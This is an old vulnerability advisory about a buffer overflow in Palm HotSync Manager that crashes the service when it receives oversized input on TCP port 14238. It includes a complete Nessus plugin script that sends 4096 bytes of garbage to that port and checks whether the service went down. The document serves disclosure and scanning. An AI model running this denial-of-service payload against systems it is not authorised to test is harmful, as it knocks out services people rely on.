Vulnerability Hotsync Affected Palm Pilot (HotSync Manager 3.0.4 under Windows 98) Description Aviram Jenik found following. A hotsync DoS attack is not as sexy as breaking to networks via printers, but it still deserves some attention. The Palm Hotsync manager is vulnerable to a buffer overflow attack that can crash the hotsync application and possibly be used to execute arbitrary code on the machine running the hotsync. When the Hotsync manager is set to 'network' mode, it listens on port 14238. By sending a large amount of data to that port followed by a newline, it's possible to crash the HotSync application. Full advisory can be found at: http://www.securiteam.com/exploits/Palm_HotSync_Manager_is_vulnerable_to_Denial_of_Service_attack.html The following Nessus Plugin can be used to test this: # # This script was written by Noam Rathaus <noamr@securiteam.com> # # See the Nessus Scripts License for details # # if(description) { name["english"] = "HotSync Manager Denial of Service attack"; script_name(english:name["english"]); desc["english"] = "It is possible to cause HotSync Manager to crash by sending a few bytes of garbage into its listening port TCP 14238. Solution: Block those ports from outside communication Risk factor : Low"; script_description(english:desc["english"]); summary["english"] = "HotSync Manager Denial of Service attack"; script_summary(english:summary["english"]); script_category(ACT_DENIAL); script_copyright(english:"This script is Copyright (C) 1999 SecuriTeam"); family["english"] = "Windows"; script_family(english:family["english"]); exit(0); } # # The script code starts here # if (get_port_state(14238)) { sock14238 = open_sock_tcp(14238); if (sock14238) { data_raw = crap(4096) + string("\n"); send(socket:sock14238, data:data_raw); close(sock14238); sleep(5); sock14238_sec = open_sock_tcp(14238); if (sock14238_sec) { security_warning(port:14238, data:"HotSync Manager port is open."); } else { security_hole(port:14238); } } } Solution HotSync Manager under Windows 2000. 3Com has been notified of this, and promised that the next release of the Hotsync manager will be fixed.